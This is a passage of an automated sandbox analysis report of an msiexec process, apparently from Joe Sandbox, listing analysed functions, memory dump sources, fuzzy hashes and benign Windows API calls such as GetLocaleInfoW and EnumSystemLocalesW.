                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 5>$>8
                                                                                                                                                                                                                                • API String ID: 0-773987393
                                                                                                                                                                                                                                • Opcode ID: 701ec3be76f917b7ee050141ed97ed633c71aef6ba3f9420bae90bf33c8d16b6
                                                                                                                                                                                                                                • Instruction ID: 0f789a2c842d0c2d788547d71b1911c18bf1961ba98780346b7a85b3f0e69cce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 701ec3be76f917b7ee050141ed97ed633c71aef6ba3f9420bae90bf33c8d16b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 343138BBD103104BC71ACF34EC5655EBBE5A789304F19593EE491AF262EB34C5068B86
                                                                                                                                                                                                                                Function 003198CC Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: G$tY#
                                                                                                                                                                                                                                • API String ID: 0-3755267963
                                                                                                                                                                                                                                • Opcode ID: 1a2a68533eeac8905dd2e65cc80e7511f23f501ddbdb3eea29d859a5948e1d54
                                                                                                                                                                                                                                • Instruction ID: 0c032e732163ab81c194ce42801e2068422c2ff0bba3303f3ad35775099a3446
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a2a68533eeac8905dd2e65cc80e7511f23f501ddbdb3eea29d859a5948e1d54
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F0F876A1C24047E30EDF299C6266AABA7EBD7304F19E93ED095D7751D538C403CA0A
                                                                                                                                                                                                                                Function 061973A6 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,061973A1,?,?,?,?,?,?,00000000), ref: 061975D3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                                                                • Opcode ID: 38919114112619c508565b732a35e6b3c55f3cc40901a3aff34f368233e1d8cf
                                                                                                                                                                                                                                • Instruction ID: 9751b5a5736c69bc39e7d43f83d0fc654f5c9f36efa580c2a23b89aef4f6bb54
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38919114112619c508565b732a35e6b3c55f3cc40901a3aff34f368233e1d8cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86B13D316206089FEB59CF2CC48AB657BE1FF45364F298658E899CF2E1C335E991CB50
                                                                                                                                                                                                                                Function 00314918 Relevance: 1.7, Strings: 1, Instructions: 494COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: TU
                                                                                                                                                                                                                                • API String ID: 0-2215587796
                                                                                                                                                                                                                                • Opcode ID: 3de10c29c0c42d6d5e1073c30d06cf39dcacb216388593bf9ce388031475b010
                                                                                                                                                                                                                                • Instruction ID: 27c7016dd2b74e44f54b7485a8f03a0919f4f89d06419d387b122f7ee59cf73d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3de10c29c0c42d6d5e1073c30d06cf39dcacb216388593bf9ce388031475b010
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BE10636619711CBC7298F38E8512AB73E2FF89361F0A887DD4858B290E779CE91C751
                                                                                                                                                                                                                                Function 061885FC Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 06188612
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                                                • Opcode ID: 1d5a2aa85c2c3f299451f53c41ea909547eba06d389e6bcaab3bea41a5879c45
                                                                                                                                                                                                                                • Instruction ID: 860e804cfc1b003459e0fd59ed9aac232ddafece9c02c2de200ea2897c2a4827
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d5a2aa85c2c3f299451f53c41ea909547eba06d389e6bcaab3bea41a5879c45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13A160B5D516058FDB59CF54E5817AEBBF2FB48324F24822ADA15E7380D3349584CF90
                                                                                                                                                                                                                                Function 002FE0F0 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoCreateInstance.OLE32(0031F5B0,00000000,00000001,0031F5A0), ref: 002FE119
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 542301482-0
                                                                                                                                                                                                                                • Opcode ID: a1629029ed88303f2527931de766cb5efee36cdf5a11dcab88c9be6366602f41
                                                                                                                                                                                                                                • Instruction ID: 842ed2a94abca4e1b13f8c995240a28756852e5fdf5eb5899f715461b5560e1e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1629029ed88303f2527931de766cb5efee36cdf5a11dcab88c9be6366602f41
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A251C4B16203099BEB219F24CC86B77B3A9EF45794F054568FA89CB2A0F374DD10C761
                                                                                                                                                                                                                                Function 002FE350 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: lS
                                                                                                                                                                                                                                • API String ID: 0-2062759450
                                                                                                                                                                                                                                • Opcode ID: 580186c77df95057a97465fd8cde484e05b64b5e99d1913bb954703ce0fdbc9f
                                                                                                                                                                                                                                • Instruction ID: f07d87eb759c11e180210ac2f5d9c6547ae0928b8a5123482a6ef25f4c1c738b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 580186c77df95057a97465fd8cde484e05b64b5e99d1913bb954703ce0fdbc9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9C188716143098BCB25DF24C89267BF3E6EFA1354F0A883CEA85873A1E7749915C792
                                                                                                                                                                                                                                Function 0619855F Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5fb4fe2629f41e51c49cd0f2d0880e5ebe84e8ca4a1d0756a1d2479931c73469
                                                                                                                                                                                                                                • Instruction ID: aa3f93c31cb8c00ae3220b6455e4dddc36f02d5cbb4e9204587eb960a3b4679f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb4fe2629f41e51c49cd0f2d0880e5ebe84e8ca4a1d0756a1d2479931c73469
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F64183B5C04219AEDFA4DF79CC88AAAB7B9AB46200F1446DDE41DD3200DB359E85CF60
                                                                                                                                                                                                                                Function 00303358 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: B40
                                                                                                                                                                                                                                • API String ID: 0-296502247
                                                                                                                                                                                                                                • Opcode ID: 746ce9acb993c4dc55a2cb171c5cec22054919d1cdfaf9ddfe8c10447c1fa8a7
                                                                                                                                                                                                                                • Instruction ID: ca92bb85159764bda0cbc00658ad44d24ae13ff4cd9a1d10c78ce643813b6fc0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 746ce9acb993c4dc55a2cb171c5cec22054919d1cdfaf9ddfe8c10447c1fa8a7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DC13571909381DFD7268F28E89035ABBF6BF86314F19866CE099873E1C734DA45CB91
                                                                                                                                                                                                                                Function 0619B790 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0619B7E4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                • Opcode ID: e632ccb6d11957688a6dbc0775854d2ec43abfea889256bea6e6f3f1f949c94e
                                                                                                                                                                                                                                • Instruction ID: 73c10599a5e3215bb1ebdd6235bce8b94a9ad850b586d491e990f55b78cb9a43
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e632ccb6d11957688a6dbc0775854d2ec43abfea889256bea6e6f3f1f949c94e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721D772A19107ABDFAC9E25EC41A7B73A9EF49710F14007EED11C6140EB74D940DB70
                                                                                                                                                                                                                                Function 002E578F Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1721974015.00000000002E1000.00000020.00000001.01000000.00000000.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1721911642.00000000002E0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722801313.000000000031E000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1722883309.0000000000321000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723023789.0000000000327000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723096468.0000000000333000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_2e0000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: LY.
                                                                                                                                                                                                                                • API String ID: 0-829310564
                                                                                                                                                                                                                                • Opcode ID: 60ccbac91ae3ca17053d58424569555d4f5315cd636df51465ff69a753637be8
                                                                                                                                                                                                                                • Instruction ID: 25e90481dfdbc77111e3fe88e66a3e2bbf1322148840e283dffa8985f3f1a912
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60ccbac91ae3ca17053d58424569555d4f5315cd636df51465ff69a753637be8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBE13275210B41DFC725CF29C940A56BBF2BB99310F188A5DE98A8BB61C731F865CF90
                                                                                                                                                                                                                                Function 0619B417 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619B53D,00000001,00000000,?,-00000050,?,0619BB71,00000000,?,?,?,00000055,?), ref: 0619B489
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                • Opcode ID: 887f110d84c8b0d9e4c364463882c065f669aba86da0415bb007e8f7faddd2eb
                                                                                                                                                                                                                                • Instruction ID: c2ed35b3887d91a843d6af45314d01ec9c2807ee7e0aac9c234185622f89a831
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 887f110d84c8b0d9e4c364463882c065f669aba86da0415bb007e8f7faddd2eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB11E9376147059FDF189F39D89157BB7A2FF80368B18442CD94787B40D371A542DB50
                                                                                                                                                                                                                                Function 0619B9BF Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0619B759,00000000,00000000,?), ref: 0619B9EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                • Opcode ID: 58b1fb8f0dd7e5776d46cd61d0babbc3828ad3db15a8ac83069157938b13478f
                                                                                                                                                                                                                                • Instruction ID: c498f99bed9c6c1d3c0d25c7b052d243e127d521174be41f18ffbd212b31c52b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58b1fb8f0dd7e5776d46cd61d0babbc3828ad3db15a8ac83069157938b13478f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D01D636E24116BFEF6C5A65EC467BB3764EB40654F054829EC12E3190EB70EE41C6A0
                                                                                                                                                                                                                                Function 0619B4B2 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: GetLastError.KERNEL32(00000000,?,06197EDD), ref: 06192AC3
                                                                                                                                                                                                                                  • Part of subcall function 06192ABF: SetLastError.KERNEL32(00000000,00000000,?,0000000B,000000FF), ref: 06192B65
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619B790,00000001,?,?,-00000050,?,0619BB39,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0619B4FC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729879468.00000000061AC000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729956876.00000000061AE000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_6180000_msiexec.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                • Opcode ID: 55a25ba41357a30a95e8fe2451480d623b156391e7c7af48326a48702b543d6e
                                                                                                                                                                                                                                • Instruction ID: 229f93856d48e78a697df901d4a202973bf07401e96f9f7860fd2505f638027c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a25ba41357a30a95e8fe2451480d623b156391e7c7af48326a48702b543d6e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9F0F6366043046FDF246F35EC81A7BBB91EF80768F05842CF9068B680C7719C42DAA0
                                                                                                                                                                                                                                Function 061941A9 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0618E31B: EnterCriticalSection.KERNEL32(?,?,0618F4F0,00000000,061AA320,0000000C,0618F4B8,?,?,06194172,?,?,06192C5D,00000001,00000364,?), ref: 0618E32A
                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0619419C,00000001,061AA5E8,0000000C,06194574,00000000), ref: 061941E1
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000005.00000002.1729154432.0000000006181000.00000020.00000001.00020000.00000000.sdmp, Offset: 06180000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729105063.0000000006180000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000005.00000002.1729693628.00000000061A1000.00000002.00000001.00020000.00000000.sdmpDownload File
